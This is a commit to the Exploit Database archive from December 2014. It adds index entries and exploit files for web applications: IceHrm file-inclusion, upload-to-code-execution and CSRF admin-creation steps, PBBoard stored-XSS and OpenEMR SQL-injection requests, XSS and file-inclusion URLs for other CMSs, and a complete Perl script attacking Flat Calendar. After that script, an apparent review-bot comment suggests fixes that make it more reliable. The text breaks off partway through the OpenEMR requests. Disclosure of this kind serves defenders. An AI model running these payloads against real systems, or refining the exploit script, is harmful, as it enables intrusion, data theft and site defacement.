Updated 12_12_2014

This commit is contained in:
Offensive Security 2014-12-12 04:53:41 +00:00
parent 19bac3ab1e
commit 8da471b3fa
10 changed files with 809 additions and 0 deletions


@ -31968,6 +31968,9 @@ id,file,description,date,author,platform,type,port
35487,platforms/php/dos/35487.php,"PHP 5.x OpenSSL Extension x Function openssl_decrypt Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0 35487,platforms/php/dos/35487.php,"PHP 5.x OpenSSL Extension x Function openssl_decrypt Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x HFS Subsystem Information Disclosure Vulnerability",2011-03-21,"Dan Rosenberg",osx,local,0 35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x HFS Subsystem Information Disclosure Vulnerability",2011-03-21,"Dan Rosenberg",osx,local,0
35489,platforms/multiple/dos/35489.pl,"Perl 5.x 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service Vulnerability",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0 35489,platforms/multiple/dos/35489.pl,"Perl 5.x 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service Vulnerability",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0
35490,platforms/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps,0
35491,platforms/php/webapps/35491.txt,"PBBoard CMS - Stored XSS Vulnerability",2014-12-08,"Manish Tanwar",php,webapps,0
35493,platforms/php/webapps/35493.txt,"Wordpress Ajax Store Locator 1.2 - Arbitrary File Download",2014-12-08,"Claudio Viviani",php,webapps,0
35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA WebAccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0 35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA WebAccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0
35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0 35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0
35497,platforms/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps,0 35497,platforms/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps,0
@ -31977,9 +31980,15 @@ id,file,description,date,author,platform,type,port
35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0 35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0
35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0
35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0 35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0
35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection Exploit",2014-12-09,"ZoRLu Bugrahan",php,webapps,0
35507,platforms/windows/dos/35507.pl,"DivX Player 7 Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0 35507,platforms/windows/dos/35507.pl,"DivX Player 7 Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-27,MustLive,php,webapps,0 35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-27,MustLive,php,webapps,0
35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 '.fp4f' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,windows,remote,0 35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 '.fp4f' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,windows,remote,0
35510,platforms/php/webapps/35510.txt,"Humhub <= 0.10.0-rc.1 - SQL Injection Vulnerability",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 35510,platforms/php/webapps/35510.txt,"Humhub <= 0.10.0-rc.1 - SQL Injection Vulnerability",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
35511,platforms/php/webapps/35511.txt,"Humhub <= 0.10.0-rc.1 - Multiple Persistent XSS vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 35511,platforms/php/webapps/35511.txt,"Humhub <= 0.10.0-rc.1 - Multiple Persistent XSS vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
35512,platforms/windows/local/35512.txt,"Mobilis 3G mobiconnect 3G++ ZDServer 1.0.1.2 - (ZTE CORPORATION) Service Trusted Path Privilege Escalation",2014-12-10,s-dz,windows,local,0 35512,platforms/windows/local/35512.txt,"Mobilis 3G mobiconnect 3G++ ZDServer 1.0.1.2 - (ZTE CORPORATION) Service Trusted Path Privilege Escalation",2014-12-10,s-dz,windows,local,0
35514,platforms/php/webapps/35514.txt,"OrangeHRM 2.6.2 'jobVacancy.php' Cross Site Scripting Vulnerability",2011-03-27,"AutoSec Tools",php,webapps,0
35515,platforms/php/webapps/35515.txt,"Alkacon OpenCms 7.5.x Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,php,webapps,0
35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability",2011-03-28,eidelweiss,php,webapps,0
35517,platforms/php/webapps/35517.txt,"pppBLOG 0.3 'search.php' Cross Site Scripting Vulnerability",2011-03-28,"kurdish hackers team",php,webapps,0
35518,platforms/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injection Vulnerabilities",2014-12-10,Portcullis,php,webapps,80


238
platforms/php/webapps/35490.txt Executable file

@ -0,0 +1,238 @@
?
IceHrm <=7.1 Multiple Vulnerabilities
Vendor: IceHRM
Product web page: http://www.icehrm.com
Affected version: <= 7.1
Summary: IceHrm is Human Resource Management web software
for small and medium sized organizations. The software is
written in PHP. It has community (free), commercial and
hosted (cloud) solution.
Desc: IceHrm <= 7.1 suffers from multiple vulnerabilities
including Local File Inclusion, Cross-Site Scripting, Malicious
File Upload, Cross-Site Request Forgery and Code Execution.
Tested on: Apache/2.2.15 (Unix)
PHP/5.3.3
MySQL 5.1.73
Vulnerabilities discovered by Stefan 'sm' Petrushevski
@zeroscience
Advisory ID: ZSL-2014-5215
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5215.php
01.12.2014
---
1. Local File Inclusion (LFI)
#####################################################
File:
app/index.php
Vulnerable code:
---- snip ----
include APP_BASE_PATH.'/'.$group.'/'.$name.'/index.php';
app/?g=../&n=../../../../etc/passwd%00
---- snip ----
Proof of Concept (PoC):
http://zsltest/icehrm/app/?g=../&n=../../../../etc/passwd%00
Severity: CRITICAL
#####################################################
2. Local File Inclusion (LFI)
#####################################################
File:
service.php
Vulnerable code:
---- snip ----
if($action == 'download'){
$fileName = $_REQUEST['file'];
$fileName = CLIENT_BASE_PATH.'data/'.$fileName;
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename='.basename($fileName));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($fileName));
ob_clean();
flush();
readfile($fileName);
---- snip ----
Proof of Concept (PoC):
http://zsltest/icehrm/app/service.php?a=download&file=../config.php
Severity: CRITICAL
#####################################################
3. Malicious File Upload / Code Execution
#####################################################
File:
fileupload.php
Vulnerable code:
---- snip ----
//Generate File Name
$saveFileName = $_POST['file_name'];
if(empty($saveFileName) || $saveFileName == "_NEW_"){
$saveFileName = microtime();
$saveFileName = str_replace(".", "-", $saveFileName);
}
$file = new File();
$file->Load("name = ?",array($saveFileName));
// list of valid extensions, ex. array("jpeg", "xml", "bmp")
$allowedExtensions = explode(',', "csv,doc,xls,docx,xlsx,txt,ppt,pptx,rtf,pdf,xml,jpg,bmp,gif,png,jpeg");
// max file size in bytes
$sizeLimit =MAX_FILE_SIZE_KB * 1024;
$uploader = new qqFileUploader($allowedExtensions, $sizeLimit);
$result = $uploader->handleUpload(CLIENT_BASE_PATH.'data/',$saveFileName);
// to pass data through iframe you will need to encode all html tags
if($result['success'] == 1){
$file->name = $saveFileName;
$file->filename = $result['filename'];
$file->employee = $_POST['user']=="_NONE_"?null:$_POST['user'];
$file->file_group = $_POST['file_group'];
$file->Save();
$result['data'] = CLIENT_BASE_URL.'data/'.$result['filename'];
$result['data'] .= "|".$saveFileName;
$result['data'] .= "|".$file->id;
}
---- snip ----
Proof of Concept (PoC) method:
1. Change the 'file_name' request parameter in desired filename. The file will be saved in 'data' folder.
Example: file_name = dsadsa.php ==will be saved in==> data/dsadsa.php.txt
2. Create a malicious file (php shell) save it with .txt extension
3. Upload the malicious file (php shell) via the upload form in fileupload_page.php. The file will appear in data folder as dsadsa.php.txt.
4. Access the file http://zsltest/icehrm/data/dsadsa.php.txt to execute the php code.
PoC example:
1. http://zsltest/icehrm/app/fileupload_page.php?id=xxx.php&msg=Upload%20Attachment&file_group=EmployeeDocument&file_type=all&user=1
2. xxx.txt contents:
<?php phpinfo(); ?>
3. Upload the filename
4. Access the file:
Severity: CRITICAL
#####################################################
4. Cross-Site Scripting (XSS)
#####################################################
File:
login.php
Vulnerable code:
---- snip ----
<script type="text/javascript">
var key = "";
<?php if(isset($_REQUEST['key'])){?>
key = '<?=$_REQUEST['key']?>';
key = key.replace(/ /g,"+");
<?php }?>
---- snip ----
Proof of Concept (PoC):
http://zsltest/icehrm/app/login.php?key=';</script><script>alert(zsl);</script>
Severity: MEDIUM
#####################################################
5. Cross-Site Scripting (XSS)
#####################################################
File:
fileupload_page.php
Vulnerable code:
---- snip ----
<div id="upload_form">
<form id="upload_data" method="post" action="<?=CLIENT_BASE_URL?>fileupload.php" enctype="multipart/form-data">
<input id="file_name" name="file_name" type="hidden" value="<?=$_REQUEST['id']?>"/>
<input id="file_group" name="file_group" type="hidden" value="<?=$_REQUEST['file_group']?>"/>
<input id="user" name="user" type="hidden" value="<?=$_REQUEST['user']?>"/>
<label id="upload_status"><?=$_REQUEST['msg']?></label><input id="file" name="file" type="file" onChange="if(checkFileType('file','<?=$fileTypes?>')){uploadfile();}"></input>
---- snip ----
Vulnerable parameters: id, file_group, user, msg
Proof of Concept (PoC):
http://zsltest/icehrm/fileupload_page.php?id=XXXX%22%3E%3Cscript%3Ealert(zsl)%3C/script%3E
Severity: MEDIUM
#####################################################
6. Information Disclosure / Leaking Sensitive User Info
#####################################################
Users/employees profile images are easily accessible in the data folder.
Proof of Concept (PoC):
http://192.168.200.119/icehrm/app/data/profile_image_1.jpg
http://192.168.200.119/icehrm/app/data/profile_image_X.jpg <- x=user id
Severity: LOW
#####################################################
7. Cross-Site Request Forgery (CSRF)
#####################################################
All forms are vulnerable to CSRF.
Documents library:
http://localhost/icehrm/app/service.php
POST
document=2&valid_until=&status=Inactive&details=detailz&attachment=attachment_evi4t3VuKqDfyY&a=add&t=EmployeeDocument
Personal info:
http://localhost/icehrm/app/service.php
GET
t=Employee
a=ca
sa=get
mod=modules=employees
req={"map":"{\"nationality\":[\"Nationality\",\"id\",\"name\"],\"employment_status\":[\"EmploymentStatus\",\"id\",\"name\"],\"job_title\":[\"JobTitle\",\"id\",\"name\"],\"pay_grade\":[\"PayGrade\",\"id\",\"name\"],\"country\":[\"Country\",\"code\",\"name\"],\"province\":[\"Province\",\"id\",\"name\"],\"department\":[\"CompanyStructure\",\"id\",\"title\"],\"supervisor\":[\"Employee\",\"id\",\"first_name+last_name\"]}"}
Add new admin user:
http://localhost/icehrm/app/service.php
POST
username=test5&email=test5%40zeroscience.mk&employee=1&user_level=Admin&a=add&t=User
Change password of user:
http://localhost/icehrm/app/service.php?
GET
t=User
a=ca
sa=changePassword
mod=admin=users
req={"id":5,"pwd":"newpass"}
Add/edit modules:
http://localhost/icehrm/app/service.php
POST
t=Module&a=get&sm=%7B%7D&ft=&ob=
Severity: LOW
#####################################################

84
platforms/php/webapps/35491.txt Executable file

@ -0,0 +1,84 @@
##############################################################################
# Exploit Title : PBBoard CMS Stored xss vulnerability
# Author : Manish Kishan Tanwar
# Vendor : http://www.pbboard.info/
# version affected: all
# Date : 7/12/2014
# Discovered @ : INDISHELL Lab
# Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti
# email : manish.1046@gmail.com
##############################################################################
////////////////////////
/// Overview:
////////////////////////
Program PBBoard is interactive Forum management program Dialogic
Free classified software Free and open source.
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
Stored xss vulnerability exist in "send private message" module, a user can send xss crafted private message to other user, and when reciever will open the message xss payload will execute
//////////////////////////////
/// Proof of Concept: -
//////////////////////////////
go to "inbox", click "compose message"
type username, title and message body , intercept the request and change the
content of "text" parameter with xss payload
when reciever will open the message, xss payload will execute
Proof image:- http://oi57.tinypic.com/112d5cx.jpg
//////////////////////
///Demo POC Request///
//////////////////////
POST /PBBoard_v3.0.1/index.php?page=pm_send&send=1&start=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/PBBoard_v3.0.1/index.php?page=pm_send&send=1&index=1&username=ica
Cookie: PowerBB_lastvisit=1417951132; PowerBB_username=ica; PowerBB_password=8a2d334536b2f4146af8cf46acd85110; security_level=0;PHPSESSID=thouojqch98pigioioepn8n2h1
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------147872036312473
Content-Length: 670
-----------------------------147872036312473
Content-Disposition: form-data; name="to[]"
ica
-----------------------------147872036312473
Content-Disposition: form-data; name="title"
hi
-----------------------------147872036312473
Content-Disposition: form-data; name="text"
hii</div><font color=red><body onload="prompt( String.fromCharCode(120,115,115,32,116,101,115,116));">//
-----------------------------147872036312473
Content-Disposition: form-data; name="icon"
look/images/icons/i1.gif
-----------------------------147872036312473
Content-Disposition: form-data; name="insert"
Save
-----------------------------147872036312473--
--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk
#############################################################################################
--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)
--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3

41
platforms/php/webapps/35493.txt Executable file

@ -0,0 +1,41 @@
######################
# Exploit Title : Wordpress Ajax Store Locator <= 1.2 Arbitrary File Download
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
# Software Link : Premium
# Dork Google: inurl:ajax-store-locator
# index of ajax-store-locator
# Date : 2014-12-06
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# PoC Exploit:
http://TARGET/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=[../../somefile]
"download_file" variable is not sanitized.
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################

130
platforms/php/webapps/35506.pl Executable file

@ -0,0 +1,130 @@
#!/usr/bin/perl -w
#Title : Flat Calendar v1.1 HTML Injection Exploit
#Download : http://www.circulargenius.com/flatcalendar/FlatCalendar-v1.1.zip
#Author : ZoRLu / zorlu@milw00rm.com
#Website : http://milw00rm.com / its online
#Twitter : https://twitter.com/milw00rm or @milw00rm
#Test : Windows7 Ultimate
#Date : 08/12/2014
#Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
#BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
#Dork1 : intext:"Flat Calendar is powered by Flat File DB"
#Dork2 : inurl:"viewEvent.php?eventNumber="
#
#C:\Users\admin\Desktop>perl flat.pl
#
#Usage: perl flat.pl http://server /calender_path/ indexfile nickname
#Exam1: perl flat.pl http://server / index.html ZoRLu
#Exam2: perl flat.pl http://server /calendar/ index.html ZoRLu
#
#C:\Users\admin\Desktop>perl flat.pl http://server /member_content/diaries/womens/calendar/ index.html ZoRLu
#
#[+] Target: http://server
#[+] Path: /member_content/diaries/womens/calendar/
#[+] index: index.html
#[+] Nick: ZoRLu
#[+] Exploit Succes
#[+] Searching url...
#[+] YourEventNumber = 709
#[+] http://server/member_content/diaries/womens/calendar/viewEvent.php?eventNumber=709
use HTTP::Request::Common qw( POST );
use LWP::UserAgent;
use IO::Socket;
use strict;
use warnings;
sub hlp() {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "\nUsage: perl $0 http://server /calender_path/ indexfile nickname\n";
print "Exam1: perl $0 http://server / index.html ZoRLu\n";
print "Exam2: perl $0 http://server /calendar/ index.html ZoRLu\n";
}
if(@ARGV != 4) {
hlp();
exit();
}
my $ua = LWP::UserAgent->new;
my $url = $ARGV[0];
my $path = $ARGV[1];
my $index = $ARGV[2];
my $nick = $ARGV[3];
my $vuln = $url . $path . "admin/calAdd.php";
print "\n[+] Target: ".$url."\n";
print "[+] Path: ".$path."\n";
print "[+] index: ".$index."\n";
print "[+] Nick: ".$nick."\n";
my @months = qw(January February March April May June July August September October November December);
my ($day, $month, $yearset) = (localtime)[3,4,5];
my $year = 1900 + $yearset;
my $moon = $months[$month];
if (open(my $fh, $index)) {
while (my $row = <$fh>) {
chomp $row;
my $req = POST $vuln, [
event => 'Test Page',
description => $row,
month => $moon,
day => $day,
year => $year,
submitted => $nick,
];
my $resp = $ua->request($req);
if ($resp->is_success) {
my $message = $resp->decoded_content;
my $regex = "Record Added: taking you back";
if ($message =~ /$regex/) {
print "[+] Exploit Succes\n";
my $newua = LWP::UserAgent->new( );
my $newurl = $url . $path . "calendar.php";
my $newreq = $newua->get($newurl);
if ($newreq->is_success) {
my $newmessage = $newreq->decoded_content;
my $first = rindex($newmessage,"viewEvent.php?eventNumber=");
print "[+] Searching url...\n";
my $request = substr($newmessage, $first+26, 4);
print "[+] YourEventNumber = $request\n";
sleep(1);
print "[+] ".$url.$path."viewEvent.php?eventNumber=".$request."\n";
}
else {
print "[-] HTTP POST error code: ", $newreq->code, "\n";
print "[-] HTTP POST error message: ", $newreq->message, "\n";
}
}
else {
print "[-] Exploit Failed";
}
}
else {
print "[-] HTTP POST error code: ", $resp->code, "\n";
print "[-] HTTP POST error message: ", $resp->message, "\n";
}
}
}
else {
sleep(1);
die ("[-] NotFound: $index\n");
}
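Review bot: The `if (open(my $fh, $index))` line uses the two-argument form of open, so a value of `$ARGV[2]` that begins or ends with `-`, `<`, `>` or `|` is parsed as a mode or a pipe rather than as a plain filename; `if (open(my $fh, '<', $index))` pins the intent and makes the later `die ("[-] NotFound: $index\n")` branch the only failure path. The error branch after `$newua->get($newurl)` prints `HTTP POST error code` and `HTTP POST error message` although that request is a GET, so the two labels should read `HTTP GET error ...` to match what the code did. The `print "[-] Exploit Failed";` line is the only status line without a trailing `\n`, which runs the next shell prompt onto it; add the newline for consistency with the surrounding messages.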


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47046/info
OrangeHRM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
OrangeHRM 2.6.2 is vulnerable; other versions may also be affected.
http://www.example.com/orangehrm-2.6.2/templates/recruitment/jobVacancy.php?recruitcode=%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E

11
platforms/php/webapps/35515.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/47055/info
Alkacon OpenCms is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to OpenCms 7.5.4 are vulnerable.
http://www.example.com/opencms/opencms/system/workplace/commons/report-locks.jsp?resourcelist=null&resource=/demo_de&includerelated=false">XSSvector
http://www.example.com/opencms/opencms/system/workplace/views/explorer/contextmenu.jsp?resourcelist=/deco_logo.png&acttarget=514f2">XSSvector

10
platforms/php/webapps/35516.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/47065/info
webEdition CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view and execute arbitrary local files in the context of the webserver process. This may aid in further attacks.
webEdition CMS 6.1.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/webEdition/index.php?DOCUMENT_ROOT= [lfi]%00
http://www.example.com/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]%00


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47068/info
pppBLOG is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
pppBLOG 0.3.0 is vulnerable; other versions may also be affected.
http://www.example.com/search.php?q=<script>alert(8888)</script>

268
platforms/php/webapps/35518.txt Executable file

@ -0,0 +1,268 @@
Vulnerability title: Multiple Authenticated SQL Injections In OpenEMR
CVE: CVE-2014-5462
Vendor: OpenEMR
Product: OpenEMR
Affected version: 4.1.2(7) and earlier
Fixed version: N/A
Reported by: Jerzy Kramarz
Details:
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database.
The following URLs and parameters have been confirmed to suffer from Multiple SQL injections:
Request 1
POST /openemr/interface/super/edit_layout.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=nq2h24dbqlcgee1rlrk3ufutq7
[...]
Content-Length: 134
formaction=&deletefieldid=&deletefieldgroup=&deletegroupname=&movegroupname=&movedirection=&selectedfields=&targetgroup=&layout_id=HIS<SQL Injection>
Request 2
POST /openemr/interface/reports/prescriptions_report.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
[...]
Content-Length: 135
form_refresh=true&form_facility=&form_from_date=2014-01-01&form_to_date=2014-07-25&form_patient_id=1<SQL Injection>&form_drug_name=a<SQL Injection>&form_lot_number=1<SQL Injection>
Request 3
POST /openemr/interface/billing/edit_payment.php HTTP/1.1
Host: 192.168.56.102
[...]
Content-Length: 186
Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en
CountIndexAbove=0&ActionStatus=&CountIndexBelow=0&after_value=&DeletePaymentDistributionId=&hidden_type_code=&ajax_mode=&payment_id=1<SQL Injection*gt;&ParentPage=&hidden_patient_code=&global_amount=&mode=
Request 4
GET /openemr/interface/forms_admin/forms_admin.php?id=17<SQL Injection>&method=enable HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
Connection: keep-alive
Request 5
POST /openemr/interface/billing/sl_eob_search.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en
----------1034262177
Content-Disposition: form-data; name="form_pid"
5<SQL Injection>
----------1034262177
Content-Disposition: form-data; name="form_without"
on
----------1034262177
Content-Disposition: form-data; name="form_deposit_date"
5
----------1034262177
Content-Disposition: form-data; name="form_paydate"
5
----------1034262177
Content-Disposition: form-data; name="form_category"
All
----------1034262177
Content-Disposition: form-data; name="form_erafile"; filename="file.txt"
Content-Type: text/plain
boom
----------1034262177
Content-Disposition: form-data; name="MAX_FILE_SIZE"
5000000
----------1034262177
Content-Disposition: form-data; name="form_amount"
5
----------1034262177
Content-Disposition: form-data; name="form_encounter"
5<SQL Injection>
----------1034262177
Content-Disposition: form-data; name="form_to_date"
5
----------1034262177
Content-Disposition: form-data; name="form_payer_id"
2
----------1034262177
Content-Disposition: form-data; name="form_source"
5
----------1034262177
Content-Disposition: form-data; name="form_name"
BOOOM
----------1034262177
Content-Disposition: form-data; name="form_search"
Search
----------1034262177
Content-Disposition: form-data; name="form_date"
5-5-5
----------1034262177--
Request 6
GET /openemr/interface/logview/logview.php?end_date=2014-07-25&sortby=<SQL Injection>&csum=&event=&check_sum=on&start_date=2014-07-25&type_event=select&eventname=login HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en
Request 7
POST /openemr/interface/orders/procedure_stats.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
form_sexes=1&form_to_date=2014-07-25&form_by=5&form_submit=Submit&form_show%5b%5d=.age&form_output=2&form_facility=4<SQL Injection>&form_from_date=0000-00-
Request 8
POST /openemr/interface/orders/pending_followup.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0; pma_theme=original
form_to_date=2014-07-25&form_refresh=Refresh&form_facility=5<SQL Injection>&form_from_date=2014-07-25
Request 9
POST /openemr/interface/orders/pending_orders.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5
form_to_date=2014-07-25&form_refresh=Refresh&form_facility=4<SQL Injection>&form_from_date=2014-07-25
Request 10
POST /openemr/interface/patient_file/deleter.php?patient=<SQL Injection>&encounterid=<SQL Injection>&formid=<SQL Injection>&issue=<SQL Injection>&document=&payment=&billing=&transaction= HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=kpqal2o1e4am9eh0lce5qt3ab0
form_submit=Yes%2c+Delete+and+Log
Request 11
POST /openemr/interface/patient_file/encounter/coding_popup.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154
Search+Results=&newcodes=&bn_search=Search&ProviderID=1&search_type=CPT4&search_term=5<SQL Injection>
Request 12
POST /openemr/interface/patient_file/encounter/search_code.php?type= HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154
text=5<SQL Injection<&submitbtn=Search&mode=search
Request 13
POST /openemr/interface/practice/ins_search.php HTTP/1.1
Host: 192.168.56.102
Accept: */*
Accept-Language: en
[...]
Cookie: OpenEMR=kpqal2o1e4am9eh0lce5qt3ab0
form_addr1=1<SQL Injection>&form_addr2=1<SQL Injection>&form_attn=5<SQL Injection>&form_country=U<SQL Injection>&form_freeb_type=2<SQL Injection>&form_phone=555-555-5555&form_partner=<SQL Injection>&form_name=P<SQL Injection>&form_zip=36<SQL Injection>&form_save=Save+as+New&form_state=W<SQL Injection>&form_city=W<SQL Injection>&form_cms_id=5<SQL Injection>
Request 14
POST /openemr/interface/patient_file/problem_encounter.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=p0locr2jieuagul105rkm95ob6
form_pelist=%2f&form_pid=0<SQL Injection>&form_save=Save&form_key=e
Request 15
POST /openemr/interface/reports/appointments_report.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5
